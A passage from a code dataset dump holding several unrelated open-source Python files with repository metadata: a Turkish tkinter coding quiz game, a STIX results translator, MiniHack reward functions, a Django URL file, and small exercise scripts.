@classmethod\n def kaynak_denetimi(cls):\n \"\"\"programın kullanacağı dosya ve klasörleri\ndenetler.Eğer varlarsa, işleme devam eder.Yoksa gerekli klasörleri\nve dosyaları oluşturur.\"\"\"\n klasor_listesi = [YOL, YOL_1, YOL_2, YOL_3]\n for klasor in klasor_listesi:\n if os.path.exists(klasor):\n pass\n else:\n os.mkdir(klasor)\n \n dosya_listesi = [\"soru0.py\", \"soru1.py\", \"soru2.py\", \"soru3.py\",\n \"soru4.py\", \"soru5.py\", \"soru6.py\", \"soru7.py\",\n \"soru8.py\", \"soru9.py\"]\n \n soru0 = \"\"\"\n#Üç kenarı a,b,c değişkenleriyle\n#5,6,7 olarak verilmiş bir üçgenin\n#alanını hesaplayan aşağıdaki programı tamamlayınız.\na = 5\nb = 6\nc = 7\ns = (a + b + c) / 2\narea = (s*(s-a)*(s-b)*(s-c)) ** 0.5\nprint(\"Üçgenin alanı {}.\".format(area))\"\"\"\n \n soru1 = \"\"\"\n#a ve b şeklinde 6 ve 19 olarak belirlenmiş\n#değişkenlerin tek mi çift mi olduğunu bulan\n#ve yazdıran aşağıdaki programı tamamlayınız.\ndef tek_cift(sayi):\n if sayi % 2 == 0:\n return \"çift\"\n else:\n return \"tek\"\na = 6\nb = 19\nprint(\"{} sayısı {}tir.\".format(a, tek_cift(a)))\nprint(\"{} sayısı {}tir.\".format(b, tek_cift(b)))\"\"\"\n\n soru2 = \"\"\"\n#1'den 10'a kadar tamsayıların toplamını bulan\n# ve yazdıran aşağıdaki programı tamamlayınız.\nsonuc = 0\nfor sayi in range(1, 11):\n sonuc += sayi\nprint(sonuc)\"\"\"\n\n soru3 = \"\"\"\n#Bir yılın artık yıl olup olmadığını bulan ve\n#2017 ile 2000 yıllarının artık olup olmadığını\n#yazdıran aşağıdaki programı tamamlayınız.\ndef artik_yil(yil):\n if (yil % 4) == 0:\n if (yil % 100) == 0:\n if (yil % 400) == 0:\n print(\"{} artık yıldır.\".format(yil))\n else:\n print(\"{} artık yıl değildir\".format(yil))\n else:\n print(\"{} artık yıldır\".format(yil))\n else:\n print(\"{} artık yıl değildir.\".format(yil))\nartik_yil(2017)\nartik_yil(2000)\"\"\"\n\n soru4 = \"\"\"\n#liste halinde verilmiş 5,8,4,96,2\n#sayılarının en büyüğünü bulan ve yazdıran\n#aşağıdaki programı tamamlayınız.\nsayi_listesi = [5, 8, 4, 96, 2]\nsonuc = sayi_listesi[0]\nfor sayi in sayi_listesi[1:]:\n if sayi > sonuc:\n sonuc = sayi\n else:\n continue\nprint(\"{} en büyük sayıdır.\".format(sonuc))\"\"\"\n \n soru5 = \"\"\"\n#5 ve 7 sayısının 
faktöriyel değerini\n#bulan ve yazdıran aşağıdaki programı tamamlayınız.\ndef faktoriyel_bul(sayi):\n if sayi == 0:\n return 1\n else:\n return sayi * faktoriyel_bul(sayi - 1)\nprint(\"{} in faktöriyeli {}\".format(5, faktoriyel_bul(5)))\nprint(\"{} in faktöriyeli {}\".format(7, faktoriyel_bul(7)))\"\"\"\n\n soru6 = \"\"\"\n#1'den 5'e kadar olan sayıların karesini ve küpünü\n#içeren 2 boyutlu bir liste üreten aşağıdaki fonksiyonu\n#tamamlayınız.(bir satır 'sayı, karesi, küpü' şeklindedir.)\niki_boyut_liste = []\nfor i in range(1, 6):\n satir = [i, i**2, i**3]\n iki_boyut_liste.append(satir)\nprint(iki_boyut_liste)\"\"\"\n\n soru7 = \"\"\"\n#çekoslovakyalılaştıramadıklarımızdanmısınız\n#harf dizisinde her harften kaç tane olduğunu\n#bulan ve '... harfinden ... tane vardır.'\n#şeklinde yazdıran aşağıdaki programı tamamlayınız.\ndef harf_sayici(kelime):\n veri_sozlugu = {}\n for harf in kelime:\n if harf in veri_sozlugu.keys():\n veri_sozlugu[harf] += 1\n else:\n veri_sozlugu[harf] = 1\n for sozcuk, sayisi in veri_sozlugu.items():\n print(\"{} harfinden {} tane vardır.\".format(sozcuk, sayisi))\nharf_sayici(\"çekoslovakyalılaştıramadıklarımızdanmısınız\")\"\"\"\n\n soru8 = \"\"\"\n#[[12, 15, 27],\n# [20, 22, 45],\n# [8, 10, 97]] 2 boyutlu listesinden 5'e\n#tam bölünebilen sayıları bulup yazdıran aşağıdaki\n#programı tamamlayınız.\nliste = [[12, 15, 27],\n [20, 22, 45],\n [8, 10, 97]]\nfor satir in liste:\n for sayi in satir:\n if sayi % 5 == 0:\n print(\"{} sayisi 5 ile bölünür.\".format(sayi))\"\"\"\n \n soru9 = \"\"\"\n#6. ve 10. sıradaki fibonacci sayılarını bulan\n#ve bu sayıları yazdıran aşağıdaki programı tamamlayınız.\ndef fibonacci_bul(sayi_sirasi):\n if sayi_sirasi < 2:\n return 1\n return fibonacci_bul(sayi_sirasi-1) + fibonacci_bul(sayi_sirasi-2)\nprint(\"{}. sıradaki fibonacci sayısı {}.\".format(6, fibonacci_bul(6)))\nprint(\"{}. 
sıradaki fibonacci sayısı {}.\".format(10, fibonacci_bul(10)))\n\"\"\"\n \n for dosya in dosya_listesi:\n if os.path.exists(YOL_1 + os.sep + dosya):\n pass\n else:\n yeni_dosya = open(YOL_1 + os.sep + dosya, 'w')\n #dosya adının ilk 5 harfi eval ile\n #tanımlanmış değişkenlere çevrilir.\n yeni_dosya.write(eval(dosya[0:5]))\n yeni_dosya.close()\n \n \n @classmethod\n def dosya_formatlayici(cls, dosya_adi):\n \"\"\"Python betik dosyalarını, programda\nkullanılabilecek şekilde formatlar.Başı # işareti ile\nbaşlayan soru satırlarını soru metni, kod satırlarını\nkod metni olarak döndürür.Bazı kod satırlarını\nsiler.\"\"\"\n soru_metni = \"\"\"\"\"\" \n betik = \"\"\"\"\"\"\n dosya_nesnesi = open(dosya_adi, 'r')\n \n for satir in dosya_nesnesi.readlines():\n if satir[0] == '#':\n yeni_satir = satir.replace('#', '')\n soru_metni += yeni_satir\n elif satir == os.linesep:\n pass\n else:\n #random sayı tek gelirse satırı sil.\n if rnd.randint(0,10) % 2 == 0:\n betik += satir\n else:\n betik += \"Bu satır silinmiştir.\" + os.linesep\n dosya_nesnesi.close()\n \n return soru_metni, betik\n \n @classmethod\n def dosya_sec(cls):\n \"\"\"soru dosyaları arasından rastgele bir\ndosyayı seçer ve okunmak için döndürür.\"\"\"\n dosya_listesi = os.listdir(YOL_1)\n rastgele_dosya = rnd.choice(dosya_listesi)\n \n return os.path.join(YOL_1, rastgele_dosya)\n \n @classmethod \n def cevap_dosyasi(cls, metin):\n \"cevap dosyası oluşturur ve metni içine yazar.\"\n dosya = open(os.path.join(YOL_3, \"cevap.py\"), 'w')\n dosya.write(metin)\n dosya.close()\n \n @classmethod\n def satir_sutun(cls, iki_boyutlu_liste):\n \"verilen 2 boyutlu listenin eleman sayısını bulur.\"\n toplam = 0\n for satir in iki_boyutlu_liste:\n for sutun in satir:\n toplam += 1\n \n return toplam\n \n \n \nclass Kronometre(tk.Label):\n \"\"\"Kronometre sınıfı.Bir taşıyıcının üstüne\nyapıştırılıp, istenilen süreyi tutar.Girilen\nsürenin sonunda string olarak girilen komutları\nçalıştırır.\"\"\"\n def __init__(self, tasiyici, sure, eylem, font=TIP_1):\n super().__init__(tasiyici)\n self.tasiyici = tasiyici\n self.sure = sure\n self.eylem = eylem\n self[\"text\"] = self.sure\n self[\"font\"] = font\n self.islem()\n \n def islem(self):\n \"\"\"Girilen süre dolduğunda girilen kodları\nçalıştırır.\"\"\"\n if self.sure <= 0:\n exec(self.eylem)\n else:\n self[\"text\"] = self.sure\n self.sure -= 1\n #süre değişimini etiket üstünde\n #gösterebilmek için taşıyıcısını günceller.\n self.after(1000, self.islem)\n \n def stop(self):\n #sürenin son değerini sabitler.\n self[\"text\"] = self.sure\n \nclass SoruToplevel(tk.Toplevel):\n \"\"\" '?' 
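# Minimal usage sketch for the Kronometre above: it counts down once per
# second via after() and exec()s the given command string when time runs out.
# Assumes it is run inside this module, where Kronometre is defined.
import tkinter as tk

root = tk.Tk()
timer = Kronometre(root, 5, "print('time is up')")  # eylem is exec'd in islem()'s scope
timer.grid(row=0, column=0)
root.mainloop()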
butonları için gereken toplevel sınıfıdır.\nKullanıcıya sorulacak soru ve kullanıcı girişi burada bulunur.\"\"\"\n def __init__(self, tasiyici, kontrolcu):\n super().__init__(tasiyici)\n \n self.kontrolcu = kontrolcu\n self.tasiyici = tasiyici\n \n self.wm_title(\"?\")\n self.resizable(width=False, height=False)#boyutu sabitle\n #eğer sayfa kapatılırsa oyunu sıfırla\n self.protocol(\"WM_DELETE_WINDOW\", self.patlama)\n \n self.kro = Kronometre(self, 60, \"self.tasiyici.patlama()\")\n self.kro.grid(row=3, column=0)\n \n self.soru_dosyasi = Islemler.dosya_sec()\n #soru metni ile betik ayrılır ve betiğin bazı satırları silinir.\n soru, betik = Islemler.dosya_formatlayici(self.soru_dosyasi)\n self.yrm = Islemler.yorumlayici_bul()#yorumlayıci bul\n \n self.soru_etiketi = tk.Label(self, text=soru, justify=tk.LEFT)\n self.soru_etiketi.grid(row=0, column=0)\n \n self.kod_girisi = tk.Text(self, background=\"black\",\n foreground=\"yellow\", \n insertbackground=\"yellow\")\n self.kod_girisi.grid(row=1, column=0)\n self.kod_girisi.insert(tk.END, betik)\n #kod giriş yerinde tab tuşunun sinyallerini\n #yakalar ve tab fonksiyonunu çalıştırır.\n self.kod_girisi.bind(\"<Tab>\", self.tab)\n \n self.islem_butonu = tk.Button(self, text=\"Derle\",\n relief=tk.RAISED, command=self.islem)\n self.islem_butonu.grid(row=2, column=0)\n \n def tab(self, arg):\n \"\"\"Metin giriş yerinde python girintileme\nyapısına uygun tab boşluklarını oluşturur.\"\"\"\n #print(\"tab pressed\")\n self.kod_girisi.insert(tk.INSERT, \" \" * 4)\n return 'break'\n \n \n def islem(self):\n \"\"\"\nKullanıcının tamamladığı kod metnini çeker ve bunu\nbir betik dosyasına kaydeder.Sonra betik_islet fonksiyonu\nile kullancının girdiyse oluşan betiği ve ana betiği\nkarşılaştırır.\"\"\"\n kullanıcı_kodu = self.kod_girisi.get(\"1.0\", tk.END)\n Islemler.cevap_dosyasi(kullanıcı_kodu)\n kullanici_dosyasi = os.path.join(YOL_3, \"cevap.py\")\n cozum_cıktısı = Islemler.betik_islet([self.yrm, \n self.soru_dosyasi])\n k_cıktısı = Islemler.betik_islet([self.yrm, kullanici_dosyasi])\n if cozum_cıktısı[0] == k_cıktısı[0]:\n #kalan süre kadar puan ekle\n self.tasiyici.puan_etiketi[\"text\"] = str(eval(\n self.tasiyici.puan_etiketi[\"text\"]) + self.kro.sure)\n self.sayfayi_temizle()\n #görüntülenecek fotoğrafı oluştur.\n self.foto = tk.PhotoImage(file=os.path.join(YOL_4, \n \"tebrik.gif\"))\n self.etiket = tk.Label(self, image=self.foto)\n self.etiket.pack()\n \n self.buton = tk.Button(self, text=\"kapat\", \n command=self.sayfayi_kapat)\n self.buton.pack()\n \n else:\n self.patlama()\n \n def patlama(self):\n self.sayfayi_temizle()\n self.kontrolcu.sayfa_yenile([\"Oyun\"])\n \n self.foto = tk.PhotoImage(file=os.path.join(YOL_4, \n \"patlama.gif\"))\n self.etiket = tk.Label(self, image=self.foto)\n self.etiket.pack()\n \n self.buton = tk.Button(self, text=\"kapat\", \n command=self.sayfayi_kapat)\n self.buton.pack()\n \n def sayfayi_temizle(self):\n \"sayfadaki tüm eşyaları siler.\"\n for w in self.winfo_children():\n w.destroy()\n \n def sayfayi_kapat(self):\n self.destroy()\n\n \nif __name__ == \"__main__\":\n app = PythonBebegim()\n app.mainloop()\n","repo_name":"ilterisYucel/python_bebegim","sub_path":"python_bebegim.py","file_name":"python_bebegim.py","file_ext":"py","file_size_in_byte":25670,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"10453302032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nConverts native results into STIX observability objects.\n\nSee: 
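# Sketch of the grading idea used in islem() above: a user's answer passes
# when the stdout of their saved script matches the stdout of the reference
# question script (file names here stand in for the real output paths).
ref_out, _ = Islemler.betik_islet(["python3", "soru0.py"])
user_out, _ = Islemler.betik_islet(["python3", "cevap.py"])
print("correct" if ref_out == user_out else "wrong")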
https://docs.oasis-open.org/cti/stix/v2.0/stix-v2.0-part1-stix-core.html\n\"\"\"\nimport json\n\nfrom stix_shifter_utils.stix_translation.src.json_to_stix import json_to_stix_translator\nfrom stix_shifter_utils.stix_translation.src.json_to_stix.json_to_stix import JSONToStix\nfrom stix_shifter_utils.stix_translation.src.utils.exceptions import LoadJsonResultsException, TranslationResultException\n\n\nclass ResultsTranslator(JSONToStix):\n \"\"\"\n Class that converting native response JSON to SIX observability objects.\n\n See: https://github.com/opencybersecurityalliance/stix-shifter/blob/develop/adapter-guide/develop-translation-module.md\n\n :param options: configuration options, see: https://github.com/opencybersecurityalliance/stix-shifter/blob/develop/adapter-guide/develop-configuration-json.md\n :type options: object\n :param dialect: dialect of the data set, see: https://github.com/opencybersecurityalliance/stix-shifter/blob/develop/adapter-guide/develop-stix-adapter.md\n :type dialect: str\n :param base_file_path: base file path to look for STIX mapping specification\n :type base_file_path: str\n \"\"\"\n def __init__(self, options, dialect, base_file_path=None):\n super().__init__(options, dialect, base_file_path)\n\n def translate_results(self, data_source, data):\n \"\"\"\n Translates native data response into STIX object\n\n :param data_source: dialect specific model mapping data, see: https://github.com/opencybersecurityalliance/stix-shifter/blob/develop/adapter-guide/develop-translation-module.md#step-2-edit-the-from_stix_map-json-file\n :type data_source: str\n :param data: native data response\n :type data: str\n :return: native query response\n :rtype: STIX object\n \"\"\"\n try:\n json_data = json.loads(data)\n data_source = json.loads(data_source)\n except Exception as exc:\n raise LoadJsonResultsException() from exc\n\n try:\n mapped_data = self.map_data\n results = json_to_stix_translator.convert_to_stix(data_source, mapped_data, json_data, self.transformers, self.options, self.callback)\n except Exception as ex:\n raise TranslationResultException(\"Error when converting results to STIX: %s\" % ex) from ex\n\n return results\n","repo_name":"deepsiIBM/secretserver","sub_path":"stix_shifter_modules/infoblox/stix_translation/results_translator.py","file_name":"results_translator.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"11550579931","text":"from numpy import linalg\nimport numpy as np\nfrom collections import defaultdict\n\n# Load matrix\nmatrix = np.loadtxt(fname='numpy_data\\\\matrix.txt', delimiter=' ')\nprint(matrix)\n\n# Solve equations\ndef solve_equation(matrix):\n left_side, right_side = np.hsplit(matrix, [len(matrix)])\n result = linalg.solve(left_side, right_side)\n print(result)\n\n# Parse equation\nequations = ['2 x + 3 y = 5', 'x - y = 0']\nmatrix = None\n\nfor equation in equations:\n coeffs = defaultdict(int)\n elems = equation.split(' ')\n coeff = 1\n\n for elem in elems:\n if elem.isdigit():\n coeff = int(elem)\n elif elem.isalpha():\n coeffs[elem] = coeff\n elif elem == '-':\n coeff *= -1\n coeffs['='] = coeff\n equa = [np.array([coeffs[key] for key in coeffs])]\n\n if matrix is not None:\n matrix = np.concatenate((matrix, equa), axis=0)\n else:\n matrix = 
equa\n\nsolve_equation(matrix)\n","repo_name":"reyvateil/FI-MUNI-PV248","sub_path":"numpy_program.py","file_name":"numpy_program.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"69826277100","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 28 23:11:23 2021\n\n@author: user\n\"\"\"\n\n#프로그래머스\n#레벨1\n#예산\n\n\ndef solution(d, budget):\n answer = 0\n \n d = sorted(d)\n \n for i in range(len(d)) :\n if budget >= d[i] :\n budget -= d[i]\n answer += 1\n \n return answer","repo_name":"YOOHYOJEONG/algorithm_practice","sub_path":"programmers/Level01_practice/예산.py","file_name":"예산.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"74929273900","text":"import numpy as np\nimport gym\nfrom nle import nethack\nfrom minihack import RewardManager\nfrom minihack import LevelGenerator\n\n#A function to get a string of the message of the current observation\ndef get_msg(obs):\n msg = obs[\"message\"]\n msg = msg.tobytes().decode(\"utf-8\")\n return msg\n\n#A function that gets the coordinates of a given glyph item in the observation\ndef glyph_pos(glyphs, glyph):\n glyph_positions = np.where(np.asarray(glyphs) == glyph)\n assert len(glyph_positions) == 2\n if glyph_positions[0].shape[0] == 0:\n return None\n return np.array([glyph_positions[0][0], glyph_positions[1][0]], dtype=np.float32)\n\n#A function that gets the inverse distance to the downard staircase \ndef distance_to_object(env, prev_obs, action, current_obs):\n glyphs = current_obs[env._observation_keys.index(\"chars\")]\n cur_pos = glyph_pos(glyphs, ord(\"@\"))\n staircase_pos = glyph_pos(glyphs, ord(\">\"))\n if staircase_pos is None:\n # Staircase has been reached\n return 0.0\n distance = np.linalg.norm(cur_pos - staircase_pos)\n distance /= np.max(glyphs.shape)\n return -distance \n\n#A function that gives a reward for expploring corridors of a cave \n#(characterised by the number of full stops uncovered)\ndef discover_maze(env, prev_obs, action, current_obs):\n curr_chars = current_obs[env._observation_keys.index(\"chars\")]\n prev_chars = prev_obs[env._observation_keys.index(\"chars\")]\n\n curr_dots = 0\n prev_dots = 0\n\n for row in curr_chars:\n for char in row:\n if char == ord(\".\"):\n curr_dots += 1\n\n for row in prev_chars:\n for char in row:\n if char == ord(\".\"):\n prev_dots += 1\n\n if curr_dots > prev_dots:\n return 0.1\n\n return 0.0\n\n#A function that gives a reward for expploring corridors of a cave \n#(characterised by the number of hastags uncovered in quest hard)\ndef discover_quest_hard(env, prev_obs, action, current_obs):\n curr_chars = current_obs[env._observation_keys.index(\"chars\")]\n prev_chars = prev_obs[env._observation_keys.index(\"chars\")]\n\n curr_dots = 0\n prev_dots = 0\n\n for row in curr_chars:\n for char in row:\n if char == ord(\"#\"):\n curr_dots += 1\n\n for row in prev_chars:\n for char in row:\n if char == ord(\"#\"):\n prev_dots += 1\n\n if curr_dots > prev_dots:\n return 0.1\n\n return 0.0\n\n#A function that gives a reward for expploring corridors of a cave and discovering the closed door\ndef discover_door(env, prev_obs, action, current_obs):\n curr_chars = current_obs[env._observation_keys.index(\"chars\")]\n prev_chars = prev_obs[env._observation_keys.index(\"chars\")]\n\n curr_dots = 0\n prev_dots = 0\n\n for row in curr_chars:\n for char in row:\n if char == 
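# Worked example of the equation pipeline above: '2 x + 3 y = 5' and
# 'x - y = 0' parse to rows [2, 3, 5] and [1, -1, 0]; hsplit separates the
# 2x2 left side from the right side and linalg.solve yields x = y = 1.
import numpy as np

m = np.array([[2.0, 3.0, 5.0], [1.0, -1.0, 0.0]])
left, right = np.hsplit(m, [2])
print(np.linalg.solve(left, right))  # [[1.], [1.]]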
ord(\"+\"):\n curr_dots += 1\n\n for row in prev_chars:\n for char in row:\n if char == ord(\"+\"):\n prev_dots += 1\n\n if curr_dots > prev_dots:\n return 0.1\n\n return 0.0\n\n#A function that gives a reward for expploring corridors of a cave and discovering the downward staircase\ndef discover_staircase(env, prev_obs, action, current_obs):\n curr_chars = current_obs[env._observation_keys.index(\"chars\")]\n prev_chars = prev_obs[env._observation_keys.index(\"chars\")]\n\n curr_staircase = 0\n prev_staircase = 0\n\n for row in curr_chars:\n for char in row:\n if char == ord(\">\"):\n curr_staircase += 1\n\n for row in prev_chars:\n for char in row:\n if char == ord(\">\"):\n prev_staircase += 1\n\n if curr_staircase > prev_staircase:\n return 0.5\n\n return 0.0\n\n\"\"\"\nA function to setup the given environment with the given configuration\n\"\"\"\ndef setup_environment(env_name, config):\n #Plain config, no rewards or custom actions or custom envs\n if config == \"plain\" and env_name != \"MiniHack-Skill-Custom-v0\":\n return gym.make(env_name, observation_keys = ['pixel', 'message', 'glyphs'])\n \n #Custom environemnt rewards, action\n else:\n reward_manager = RewardManager()\n ACTIONS = tuple(nethack.CompassDirection) \n\n #Custom room 5x5 configuration\n if env_name == \"MiniHack-Room-5x5-v0\":\n reward_manager.add_eat_event(\"apple\", reward = 1.0)\n reward_manager.add_location_event(\"staircase down\", 2.0)\n reward_manager.add_custom_reward_fn(distance_to_object)\n\n return gym.make(env_name, \n observation_keys = ['pixel', 'message', 'glyphs'], \n actions = ACTIONS, \n reward_manager=reward_manager)\n \n #Custom mazewalk configuration\n elif env_name == \"MiniHack-MazeWalk-9x9-v0\":\n reward_manager.add_eat_event(\"apple\", reward = 1.0)\n reward_manager.add_location_event(\"staircase down\", 2.0)\n reward_manager.add_custom_reward_fn(discover_maze)\n reward_manager.add_custom_reward_fn(discover_staircase)\n\n return gym.make(env_name, \n observation_keys = ['pixel', 'message', 'glyphs'], \n actions = ACTIONS, \n reward_manager=reward_manager)\n\n #Custom lava cross configuration\n elif env_name == \"MiniHack-LavaCross-Levitate-Potion-Inv-Full-v0\":\n reward_manager.add_eat_event(\"apple\", reward = 1.0)\n reward_manager.add_location_event(\"staircase down\", 2.0)\n reward_manager.add_message_event([\"drink\"], reward = 0.2, terminal_sufficient = False)\n reward_manager.add_message_event([\"float\"], reward = 0.5, terminal_sufficient = False)\n reward_manager.add_message_event([\"stone\", \"wall\"], reward = -0.3, terminal_sufficient = False)\n\n ACTIONS += (nethack.Command.QUAFF, nethack.Command.FIRE)\n\n return gym.make(env_name,\n observation_keys = ['pixel', 'message', 'glyphs'], \n actions = ACTIONS, \n reward_manager=reward_manager)\n \n #Custom quest hard configuration\n elif env_name == \"MiniHack-Quest-Hard-v0\":\n reward_manager.add_eat_event(\"apple\", reward = 1.0)\n reward_manager.add_location_event(\"staircase down\", 2.0)\n reward_manager.add_custom_reward_fn(discover_quest_hard)\n reward_manager.add_custom_reward_fn(discover_door)\n\n return gym.make(env_name, \n observation_keys = ['pixel', 'message', 'glyphs'], \n actions = ACTIONS, \n reward_manager=reward_manager)\n \n #Custom Eating Apples configuration with a custom environment\n elif env_name == \"MiniHack-Skill-Custom-v0\":\n lvl_gen = LevelGenerator(w=4, h=4)\n lvl_gen.add_object(\"apple\", \"%\", place=(3, 3))\n lvl_gen.set_start_pos((0, 1))\n\n reward_manager.add_eat_event(\"apple\", 1.0, 
terminal_sufficient = True)\n\n if config == \"config\":\n reward_manager.add_message_event([\"apple\", \"[ynq]\"], reward = 0.5, repeatable = False)\n\n ACTIONS += (\n nethack.Command.EAT,\n )\n \n return gym.make(\n \"MiniHack-Skill-Custom-v0\",\n observation_keys=(\"glyphs\", \"pixel\", \"message\"),\n des_file=lvl_gen.get_des(),\n reward_manager=reward_manager,\n actions=ACTIONS,\n )\n \n else:\n return gym.make(\n \"MiniHack-Skill-Custom-v0\",\n observation_keys=(\"glyphs\", \"pixel\", \"message\"),\n des_file=lvl_gen.get_des(),\n reward_manager=reward_manager,\n )\n","repo_name":"dami2106/minihack-project","sub_path":"Code/environment_manager.py","file_name":"environment_manager.py","file_ext":"py","file_size_in_byte":7980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"43719014873","text":"def match_lists(a, b, f, no_dupes=False):\n # tries to match elements from the two lists\n # f is a function that can simplify the elements of the lists to try to get a match. for instance, str.lower\n # will return dictionaries containing the matches (using the original elements) as well as lists of mismatches\n # no_dupes=True will throw an exception one element matched duplicate elements of another list\n # matches will be in a list, unless no_dupes=True\n # tip: try running with no_dupes=True, then adjust if there are dupes\n default_val = None if no_dupes else []\n dic_a = {x:f(x) for x in a}\n dic_b = {x:f(x) for x in b}\n ret_a = {x:default_val for x in a}\n ret_b = {x:default_val for x in b}\n \n for ka, va in dic_a.items():\n for kb, vb in dic_b.items():\n if va == vb:\n if no_dupes:\n if ret_a[ka] != default_val:\n raise ValueError(f'duplicate matches for first list key {ka}')\n if ret_b[kb] != default_val:\n raise ValueError(f'duplicate matches for second list key {ka}')\n ret_a[ka] = kb\n ret_b[kb] = ka\n else:\n ret_a[ka].append(kb)\n ret_b[kb].append(ka)\n \n return [ret_a, ret_b, [x for x in ret_a if ret_a[x]==default_val], [x for x in ret_b if ret_b[x]==default_val]]\n\ndef full_matcher(a, b, functions, no_dupes=False):\n # see match_lists for documention\n # runs off a list of functions -- runs functions after the first only on mismatches\n ret = match_lists(a, b, functions[0], no_dupes)\n for f in functions[1:]:\n updated = match_lists(ret[2], ret[3], f, no_dupes)\n ret[0].update(updated[0])\n ret[1].update(updated[1])\n ret[2] = updated[2]\n ret[3] = updated[3]\n return ret\n\n## functions that might be helpful\ndef get_chr_remover_function(forbid_list:str):\n def ret_fn(s:str):\n ret = s\n for c in forbid_list:\n ret = ret.replace(c, '')\n return ret\n return ret_fn","repo_name":"BenKester/casting_eda","sub_path":"lab_runner/list_matcher.py","file_name":"list_matcher.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40839256985","text":"import re\n\nf = open('popular-names.txt', 'r', encoding='utf-8')\nfile = f.read()\nf.close()\n\nchanged_file = re.sub('\\t', ' ', file)\n\ntexts = file.split('\\n')\nchanged_texts = changed_file.split('\\n')\n\nfor i in range(10):\n print(texts[i])\n print(changed_texts[i])","repo_name":"okada1220/100knock","sub_path":"100knock_chapter2/100knock_chapter2_11.py","file_name":"100knock_chapter2_11.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21950598920","text":"from 
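# Usage sketch for match_lists/full_matcher above: a case-insensitive first
# pass with str.lower, then a character-stripping pass over the leftovers
# (both helpers are defined in the module above).
a = ["Alice", "BOB", "carol-x"]
b = ["alice", "bob", "carolx"]
matched = full_matcher(a, b, [str.lower, get_chr_remover_function("-")], no_dupes=True)
print(matched[0])  # {'Alice': 'alice', 'BOB': 'bob', 'carol-x': 'carolx'}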
django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.MainView.as_view(), name='Список объявлений'),\n path('fill_db/', views.FillDB.as_view(), name='Добавить записи в БД'),\n path('random/', views.RandomView.as_view(), name='Случайное объявление'),\n path('advertisements/', views.AdsListView.as_view(), name='Список объявлений'),\n path('advertisements/<int:pk>/', views.AdsDetailView.as_view(), name='Список объявлений детали'),\n]\n","repo_name":"andreystashev/python_django","sub_path":"04_DatabasesAndModels/board/advertisements_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"216988713","text":"\"\"\"\nThis module implements the class Entity\n\"\"\"\n\n\nclass Entity:\n\n def __init__(self, name):\n self.name = name\n self.freebase_id = None\n self.freebase_label = None\n self.kb_abstract = None\n self.kb_nouns = None\n self.similarity_score = None\n\n def __str__(self):\n return \"Entity____ NAME: {} , ID: {} , LABEL: {}\".format(self.name, self.freebase_id, self.freebase_label)\n\n","repo_name":"DoxopoulosPanos/WebData_assignment","sub_path":"scripts/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4336965810","text":"# /bin/env python\n# -*- encode: utf-8 -*-\n__author__ = '@pedro1hen1'\n# Exercicio 08\n\"\"\"Faça um programa que calcule o valor total investido por um colecionador\nem sua coleção de CDs e o valor médio gasto em cada um deles.\nO usuário deverá informar a quantidade de CDs e o valor para em cada um.\"\"\"\n\n\ndef ex08():\n entry_cd = int(input(\"Insira o total de CDs adquiridos \\n \"))\n count = 0\n for i in range(1, entry_cd + 1):\n preco = float(input(\"Insira o preço pago por cada CD \"))\n count = (count + preco)\n media = (count / entry_cd)\n print(\"-total investido =\", count, \"$\")\n print(\"-valor gasto em cada CD =\", media, \"$\")\n\n\nex08()\n","repo_name":"pedro1hen1/treinamento","sub_path":"lista_04/ex08.py","file_name":"ex08.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19905900162","text":"from spacy import Language\nfrom typing import List\n\nfrom spacy.tokens import Doc, Span\n\nimport re\n\nfrom transformers import pipeline\n\ndef extract_triplets(text):\n \"\"\"\n Function to parse the generated text and extract the triplets\n \"\"\"\n triplets = []\n relation, subject, relation, object_ = '', '', '', ''\n text = text.strip()\n current = 'x'\n for token in text.replace(\"<s>\", \"\").replace(\"<pad>\", \"\").replace(\"</s>\", \"\").split():\n if token == \"<triplet>\":\n current = 't'\n if relation != '':\n triplets.append({'head': subject.strip(), 'type': relation.strip(),'tail': object_.strip()})\n relation = ''\n subject = ''\n elif token == \"<subj>\":\n current = 's'\n if relation != '':\n triplets.append({'head': subject.strip(), 'type': relation.strip(),'tail': object_.strip()})\n object_ = ''\n elif token == \"<obj>\":\n current = 'o'\n relation = ''\n else:\n if current == 't':\n subject += ' ' + token\n elif current == 's':\n object_ += ' ' + token\n elif current == 'o':\n relation += ' ' + token\n if subject != '' and relation != '' and object_ != '':\n triplets.append({'head': subject.strip(), 'type': relation.strip(),'tail': object_.strip()})\n\n return 
